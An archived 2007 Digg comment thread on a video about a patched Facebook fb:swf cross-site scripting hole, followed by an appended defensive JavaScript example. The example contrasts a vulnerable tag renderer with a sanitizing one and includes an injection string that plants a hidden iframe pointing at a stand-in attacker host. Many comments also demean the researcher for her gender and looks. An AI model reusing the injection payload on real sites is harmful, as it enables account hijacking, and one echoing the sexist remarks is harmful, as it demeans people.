Facebook Loophole: i-frames watch!
5min.com — Learn how to manipulate Facebook's privacy settings using i-frames and style sheets. NOT intended for malicious use!
- 899 diggs
- padfignton, on 11/27/2007, -18/+0I like it
- persecuted, on 11/27/2007, -1/+11Insightful and thought provoking point.
- Johnbrad34, on 11/27/2007, -16/+2I'm not sure it's educational, but cool trick.
- echolyean, on 11/27/2007, -0/+8It's not a trick, it's a warning. A lesson, as it were. So yes, it is educational.
- mwang1999, on 11/27/2007, -35/+2Only 27 diggs and on the front page? Is this a new record?
- Archon810, on 11/27/2007, -2/+27No.
- mwang1999, on 11/27/2007, -3/+1What's the record, then for least number of diggs to front page?
- Archon810, on 11/27/2007, -0/+1226. It's in the Guinness World Book of Records, you can go check.
- Tenetri, on 11/27/2007, -0/+215 is the minimum I believe, but that's all time calculations and such
- PaulLewis, on 11/27/2007, -0/+0Actually just one. A moderator got his post up to the front page with only 1 digg.
- johnwc723, on 11/27/2007, -0/+2I can imagine it doesn't take too many diggs for something from Videos>Educational section to end up on the front page...
- Chaulis, on 11/27/2007, -0/+3He has been dug down 27 times, I kinda don't want to dig him down more. 27 seems fitting.
- DeviantDragon, on 11/27/2007, -3/+79Okay the main implication is not that it's "cool" it's that this has tremendous potential for malicious action and abuse. Beware.
- diulei, on 11/27/2007, -1/+38If you visit her website detailing her Facebook project, you'll see that they've already fixed this exploit as of August 2007. So this video is a few months old.
http://www.cs.virginia.edu/felt/fbook/
- jserio, on 11/27/2007, -0/+5I'd hit it! I mean, um.
- radzie78, on 11/28/2007, -0/+2http://www.cs.virginia.edu/felt/photo.html
- webcrumb, on 11/27/2007, -11/+2Yet more proof that Internet Explorer is the worst thing to happen to the web... except for the whole making Mozilla happen thing... can anyone explain why we need iframes anyway?
- iziizi, on 11/27/2007, -0/+8Yes, but I can't be bothered. And the exploit was through FIREFOX...
- capitocapito, on 11/27/2007, -1/+2It was shown in Firefox, but it can easily be extended to Internet Explorer.
It's not the fault of either browser. The exploit happened in Facebook's SWF tag in their application development platform. It is Facebook's fault.
- sint4x, on 11/27/2007, -0/+2WYSIWYG editors
- webcrumb, on 11/27/2007, -0/+1I see most of you missed my point, which was not to blame IE allowing the exploit now, but for introducing the iframe element in the first place. IE3 was the first browser to support iframes (Netscape 4 did not). Hence, all use of the iframe tag as introduced into the HTML4 spec stems from that.
- riah, on 11/27/2007, -0/+2Link to full details of how it worked, for those interested:
http://www.cs.virginia.edu/felt/fbook/facebook-xss ...
- Archon810, on 11/27/2007, -10/+3How long till it's maliciously used?
- teh_techie, on 11/27/2007, -0/+5Well, seeing as how they already patched this hole.. never!
- luet, on 11/27/2007, -4/+9I'm burying this because of what the end of the video said. It will happen.
- Commodore84, on 11/27/2007, -0/+4Whoa, that was a close one. I'm glad we have you on the lookout burying things for us so the bad guys don't find out. Meanwhile, it makes the front page.
P.S. It was fixed in August.
- a3r0, on 11/27/2007, -3/+5I believe this has been fixed. Although, there are likely quite a few more
- MALONN, on 11/27/2007, -8/+1Wonder how long until this exploit is fixed
- dankosaur, on 11/27/2007, -0/+26negative 3 months
- merreborn, on 11/27/2007, -1/+5It was fixed in August.
http://www.cs.virginia.edu/felt/fbook/
- theblt, on 11/27/2007, -2/+1This is a different exploit that hasn't been patched yet. The one you linked to uses the FB:SWF element which is different from the one this girl was describing.
- manitoba98xp, on 11/27/2007, -0/+1Incorrect. This is the same exploit.
- DemsFTW, on 11/27/2007, -10/+0@ Archon810 - Too late..
just kidding.
- arcooke, on 11/27/2007, -0/+13@ DemsFTW - Use the reply link.
not kidding.
- koft, on 11/27/2007, -0/+1What are you, the ***** digg police?
- jus1haz2, on 11/27/2007, -10/+129I wonder if the girl is hot?
- JARSInc, on 11/27/2007, -3/+45http://xkcd.com/322/
- OpenFuture, on 11/27/2007, -15/+1no very, very, very obese
- NicksVideo, on 11/27/2007, -0/+39http://www.cs.virginia.edu/felt/photo.html
- Bologner, on 11/27/2007, -1/+26Wow, cute as hell.
- jimi1337, on 11/27/2007, -14/+2Meh:
http://www.cs.virginia.edu/felt/photo.html
- will-rom, on 11/27/2007, -7/+37doesn't matter. she doesn't even use Adblock. psshhh. what a n00b.
- richardiscool, on 11/27/2007, -2/+17She's using Safari.
- Murdats, on 11/27/2007, -5/+18exactly, psshhh. what a n00b
- michaelothomas, on 11/27/2007, -11/+5Well, at a bare minimum, she's out of your league. *****.
- cnot3, on 11/27/2007, -11/+8She's in CS, its questionable if she is even really a girl.
- Funpolice2050, on 11/28/2007, -0/+0So true.
- postalblowfish7, on 11/27/2007, -0/+15she's out of your league.
- Mageling, on 11/27/2007, -0/+8Yeah, she's conscious.
- hartley, on 11/27/2007, -9/+1I have been doing the same thing for a long time over at Office Live.
They're tools are terrible, but I can link and add my own content and coding by using i-frames.
- arcooke, on 11/27/2007, -2/+7Their.
Would you say "They are tools are terrible"? No.. so don't use "they're".
English 101. Stay in school.
- bejayel, on 11/27/2007, -0/+1thats somethign i would almost classify as english pre-kindergarden actually.
- Bologner, on 11/27/2007, -0/+2So is capitalizing the first word in a sentence, spelling "something", capitalizing your "I"s, and separating sentence fragments with punctuation.
||008.
- Bologner, on 11/27/2007, -0/+1Ugh, I meant noob.
I failz at the internetz.
- Murdats, on 11/27/2007, -0/+1there is a difference between being lazy, and doing something that is the same or more effort but wrong.
the internet requires basic grammar, not good grammar.
- derjames, on 11/27/2007, -2/+3Americans. They will never learn to spell...
- koft, on 11/27/2007, -0/+1Thank you captain anal for pointing out a typo.
- SPThom, on 11/27/2007, -10/+4Speaking of malicious action and abuse... If you get a "Flash Player 9 Required" message, I wouldn't recommend installing directly from this page. I don't want to sling mud if I'm wrong, but the installer seems very fishy, and is most definitely NOT the same installer you can get from the Flash website.
- BlueStreak69, on 11/27/2007, -8/+2Pretty awesome video. Before, I've never seen a video about computers narrated by a girl :D She knows her stuff
- legendxx, on 11/27/2007, -14/+2uva is full of pompous assholes.
also their women are unattractive.
http://www.davidcatalano.com/eklektos/2006/06/uva_ ...
- TwoLOUD, on 11/27/2007, -4/+7Saying it's not for malicious use surely means..'openly asking for attacks and misuse by idiots' DUMB!
- giveer, on 11/27/2007, -6/+2I'll admit my own stupidity.. her narration of the first three quarters was just "On my friend's wall post and account of my other friend, whom I friended and posted on the friend wall before making a post on the profile of my original friend request......." DAH! I think I wet myself.
- RooDoG, on 11/27/2007, -7/+10*Insert sexist digg comment here?*
- UberNick, on 11/27/2007, -1/+5The creator's page with full details on exploit:
http://www.cs.virginia.edu/felt/fbook/
- UberNick, on 11/27/2007, -0/+4The idea behind the exploit is that facebook's api gives developers a swf tag to play flash movies. Facebook's code will automatically embed an image that links to this swf tag, and external styles can be applied to this image. Good find. I'm sure more exploits will be found in the API.
An interesting side note for someone with a CS degree interested in security... She posts a "censored" resume on her site that's vulnerable to the same "copy-paste exploit" as government agencies have been getting all kinds of bad press about. Bravo.
- MrCalifornia, on 11/28/2007, -0/+1She must be a digger cause she fixed this.
- UberNick, on 11/29/2007, -0/+1haha, she did
- merreborn, on 11/27/2007, -1/+6It also says that facebook closed the hole 2 months ago.
- TheBigPoppaJW, on 11/27/2007, -4/+6confused? so how do i use this to my advantage/stalkerness?
- Jektal, on 11/27/2007, -0/+1Do this on your profile, have everyone who visits send you a friend request or message, and track who views your profile?
- Rockmaninoff, on 11/27/2007, -7/+2GO HOOS.
- kalleanka, on 11/27/2007, -0/+23From her website:
"Facebook patched the XSS hole last night. The flaw was located in the fb:swf tag, which is the FBML tag that allows for the embedding of a Flash swf file."
Seems it's fixed by now.
- vsujohn2, on 11/27/2007, -0/+12Lol, last night as in 2+ months ago
- voetsjoeba, on 11/27/2007, -0/+9I puked a little when I realized what FBML stands for.
- MalDON, on 11/27/2007, -4/+2Wow, I've known about this for a long time. Facebook has many, many issues that are hidden. Facebook developers get all the fun.
- Hixz, on 11/27/2007, -2/+7"Facebook patched the XSS hole last night." posted on 16 August 2007
http://www.cs.virginia.edu/felt/fbook/
laugh out loud.
- amk07, on 11/27/2007, -10/+5She's not as beastly as I envisioned...
http://www.cs.virginia.edu/felt/photo.html
- gamarada717, on 11/27/2007, -3/+1Wow. Nice Find.
- zachshmack, on 11/27/2007, -0/+1You're creepy.
- SealandRes1, on 11/27/2007, -1/+1Would you not need administrative access to add/modify stylesheets used to insert iFrames?
In other words, this needs to be done on a computer with administrative access, which probably amounts to nothing much more than someone's computer.
- adrifelt, on 11/27/2007, -0/+1No, you can do that dynamically with JavaScript.
- Damian91, on 11/27/2007, -5/+1All I want is a simple background instead of white. Is that so much to ask!? :(
- plusmedic, on 11/27/2007, -0/+8Yes, far too much. Facebook applications have ruined Facebook enough at is, the last thing it needs is the ability for users to start modifying their profile until it's an ugly, seething, sparkling page of bad design.
- phronko, on 11/27/2007, -0/+5Myspace.
That is all.
- LordRedSnake, on 11/27/2007, -2/+0Yes go back to myspace. I knew facebook was going downhill once they opened up to non-ivy league colleges, and now anybody.
- dhess, on 11/27/2007, -5/+4Aaaaaaaand... this Virginia cs student just secured a cushy job at Facebook for herself. Well done =)
- uracre, on 11/27/2007, -0/+2Doesn't really happen that way. First she has to come up with something more than digging for exploits and security holes. In this case this is not even a major issue to begin with.
- skeetshot, on 11/27/2007, -2/+11All your wall post are belong to us
- tomharrow, on 11/27/2007, -1/+3jesus christ - that is a blast from the past!
- michaelothomas, on 11/27/2007, -0/+9Congrats on making the front page of digg Adrienne, who cares if it's like 3 months late...:)
- ShokDoktor, on 11/27/2007, -4/+3hidden iframes are such a dirty hack.
- casual7y, on 11/27/2007, -2/+6sweet -- so i should be able to make hot girls create relationship requests with me amirite?!
- tapeman11, on 11/27/2007, -5/+0Adrienne Felt..... my wiener. This is stupid, who cares, I cannot believe this made Digg front page, it makes me sad.
- diggjosh, on 11/27/2007, -8/+3BURIED AS INACCURATE!
Girls know nothing of Ajax, js, etc.
- KingBunny, on 11/27/2007, -0/+1@ arcooke:
Maybe there WAS NO reply link for him.. for me, it disappears when I log in, which is the only time I'd want to click it...
PS: WHERE'S THE DAMN REPLY LINK??? >:(
- mrjoanofarc, on 11/27/2007, -4/+1If they want their profile to look like myspace, I say, use myspace. Not facebook. I realized what this was all about as soon as she switched the screen to the "cool" profile with the annoying, neverending, mini-scroll boxes and terrible, ugly bars of pink.
- mrjoanofarc, on 11/27/2007, -2/+1Too bad I can't delete. Sorry.
- Bojimha, on 06/09/2008, -1/+1I wish I could have purple trim on my headings too :-(
- Raerth, on 11/27/2007, -0/+1Any browser that lets you add custom style sheets (or userscripts) will do, like hmm, firefox, opera, etc...
- jakash, on 11/27/2007, -0/+2je ne comprends pas :(
- Archer007, on 11/27/2007, -0/+1"Here's how to seriously exploit a major Internet site, but it's NOT for abuse... No, really..."
- JayCracker, on 11/27/2007, -1/+1a majorly ***** internet site.
- steelclash84, on 11/27/2007, -1/+1This will teach people that mindlessly accept a friend's request without actually knowing the person. All in the name of becoming e-popular with a meaningless number of friends statistic. If they get hacked and have their privacy stuff leaked, then it serves them right.
- JayCracker, on 11/27/2007, -7/+1woot! go figure an american government website has security flaws, ah well at least all those dumb asses like to get profiled.
- gamerzworld, on 11/27/2007, -6/+2Facebook = MySpace.
- mhender, on 11/27/2007, -2/+2using Z in your name instead of S = cool in middle school.
- UNL1M1T3D, on 11/27/2007, -1/+1You sir deserve three diggs.
- adrifelt, on 11/27/2007, -0/+2The filtering hole that made this possible was fixed in August. What I think is interesting is the fact that a small, simple hole can be abused to do major damage (take control over user accounts / spread like a virus / etc). Although they patched the hole, the design flaw still exists. Mashup security is hard. If you want detailed information on how this type of thing works, check out: http://www.cs.virginia.edu/felt/fbook/facebook-xss ...
Also, there's a lot of confusion about the friend requests.....clearly the VICTIM is not the one OKing the friend request. If you had looked at my profile while this worked, you'd unknowingly send me a friend request. Then I (as the hacker who controls the code) have the option of accepting/not accepting the request.
- arsalan, on 11/27/2007, -7/+4I think the problem is his apple computer not the website ;)
- mhender, on 11/27/2007, -0/+2It's a woman.
Believe it.
- iguanapunk, on 11/27/2007, -5/+1What a stupid bitch! If only she could properly communicate, I wouldn't be so angry.
- Helois, on 11/27/2007, -3/+1Kind of lame , if this was a male commenting would it be front page 3 months late?
- ctc803, on 11/27/2007, -0/+1this doesn't teach you how to do it, it just shows it being done!
- CyberSol, on 11/27/2007, -0/+2Mom?
- RSS14, on 11/27/2007, -0/+1I had no idea what the hell she was talking about, the only reason I watched until the end was because she was a girl :/
- PhrosTT, on 11/28/2007, -1/+1SUMMARY OF HACK:
1. facebook lets you develop apps
2. apps can include FBML tags, their made-up markup, for a bunch of different things.
one such thing is styling the image they will use for a thumbnail of any flash in your app
-they replace any swfs with image thumbnails and make you click before they load - this way no annoying sounds and ***** on page load.
3. the is eventually parsed by facebook into an HTML -
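The mechanism that UberNick's and adrifelt's comments and the summary above describe (an app-supplied style for the swf placeholder image that Facebook's filter let through into the rendered profile), as an added example that is not part of this thread, of Facebook's code, or of Adrienne Felt's write-up. It is a toy server-side renderer for an fb:swf-style tag; the attribute names (swfsrc, imgsrc, imgstyle), the output markup and the payload are all assumptions. renderSwfNaive interpolates the tag's attributes straight into HTML, so a crafted imgstyle value closes the style attribute and the img tag and drops a hidden iframe into the page. renderSwfSafe allow-lists a few CSS properties with constrained values, accepts only http(s) URLs and attribute-escapes every value, so the same input renders as one inert image.

```javascript
// Added example: hypothetical fb:swf-style tag renderer, not Facebook's code.
// Attribute names (swfsrc, imgsrc, imgstyle) and the payload are assumptions.

const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => ATTR_ESCAPES[c]);
}

// Vulnerable renderer: app-supplied attributes go into the markup untouched, so
// imgstyle can terminate the style attribute and the <img> tag and append any
// element it likes (the "filtering hole" the thread talks about). swfsrc is also
// spliced into an inline JavaScript string, a second injection context.
function renderSwfNaive(attrs) {
  return `<img src="${attrs.imgsrc}" style="${attrs.imgstyle}" ` +
         `onclick="playSwf('${attrs.swfsrc}')">`;
}

// Hardened renderer: only these CSS properties, with tightly constrained values,
// survive. Anything else in the style string is dropped rather than escaped,
// because a style attribute is its own mini-language and escaping alone does
// not stop, say, a position:fixed overlay covering the real page.
const ALLOWED_CSS = {
  width:  /^\d{1,4}(px|%)$/,
  height: /^\d{1,4}(px|%)$/,
  border: /^(none|\d{1,2}px solid #[0-9a-fA-F]{3,6})$/,
};

function sanitizeStyle(style) {
  const kept = [];
  for (const decl of String(style).split(';')) {
    const idx = decl.indexOf(':');
    if (idx < 0) continue;
    const prop = decl.slice(0, idx).trim().toLowerCase();
    const val = decl.slice(idx + 1).trim();
    if (ALLOWED_CSS[prop] && ALLOWED_CSS[prop].test(val)) kept.push(`${prop}:${val}`);
  }
  return kept.join(';');
}

// Reject anything that is not an absolute http(s) URL (javascript:, data:, relative paths).
function safeUrl(url) {
  try {
    const u = new URL(String(url));
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : '';
  } catch (e) {
    return '';
  }
}

// The swf URL is exposed as a data attribute for a separate click handler
// instead of being built into inline JavaScript.
function renderSwfSafe(attrs) {
  return `<img src="${escapeAttr(safeUrl(attrs.imgsrc))}" ` +
         `style="${escapeAttr(sanitizeStyle(attrs.imgstyle))}" ` +
         `data-swf="${escapeAttr(safeUrl(attrs.swfsrc))}">`;
}

// Crude check to run over rendered output: list the element names. A single
// fb:swf placeholder must render to exactly one <img> and nothing else.
function tagNames(html) {
  return Array.from(html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g), (m) => m[1].toLowerCase());
}

// Constructed inputs (not taken from the thread or the write-up).
const benignAttrs = {
  imgsrc: 'https://example.invalid/thumb.png',
  swfsrc: 'https://example.invalid/movie.swf',
  imgstyle: 'width:100px; height:50px; color:red',
};
const hostileAttrs = {
  imgsrc: 'javascript:alert(1)',
  swfsrc: 'https://example.invalid/movie.swf',
  imgstyle: 'width:1px"><iframe src="https://attacker.invalid/" style="display:none"></iframe><img alt="',
};

console.log('naive:', renderSwfNaive(hostileAttrs), tagNames(renderSwfNaive(hostileAttrs)));
console.log('safe :', renderSwfSafe(hostileAttrs), tagNames(renderSwfSafe(hostileAttrs)));
console.log('benign style kept:', sanitizeStyle(benignAttrs.imgstyle));
```

The hidden iframe is the payload the thread keeps coming back to: once it is in the profile, its contents run with the viewer's session, which is how a visitor can be made to send a friend request without clicking anything. Escaping the attribute would have stopped the tag breakout, but the allow-list is what also stops purely CSS-based abuse of the thumbnail, which is why the safe renderer does both.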